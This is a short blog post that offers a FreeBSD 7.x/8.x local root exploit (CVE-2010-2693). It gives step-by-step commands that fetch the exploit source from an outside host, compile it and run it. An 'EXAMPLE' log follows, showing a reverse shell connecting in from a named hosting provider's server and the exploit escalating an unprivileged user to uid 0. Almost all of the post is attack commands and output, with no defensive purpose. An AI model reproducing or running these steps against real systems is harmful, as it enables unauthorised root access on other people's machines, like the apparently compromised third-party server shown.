FreeBsd 7.x 8.x Local root

[+] Download [+]
http://jon.oberheide.org/files/cve-2010-2693.c
[+] how to [+]

fetch http://jon.oberheide.org/files/cve-2010-2693.c
gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
./cve-2010-2693


++++++++++++++++++++++++++++EXAMPLE++++++++++++++++++++++++++++++++++++++++++


connect to [xxx.xxx.xxx.xxx] from smk-a.majordomo.ru [78.108.84.161] 59628
FreeBSD 8.1-STABLE FreeBSD 8.1-STABLE #0: Fri Nov 5 12:26:40 MSK 2010 root@smk.majordomo.ru:/usr/obj
uid=30049(u101692) gid=30049(u101692) groups=30049(u101692)
fetch http://jon.oberheide.org/files/cve-2010-2693.c
cve-2010-2693.c 4952 B 42 MBps
gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...



[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.6
[+] found getuid function at 0x000567b0
[+] target: 0x000567b0, adjusted: 0x00055fb0, writes: 1375
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
id
uid=0(root) gid=30049(u101692) groups=30049(u101692)  


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Categories

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)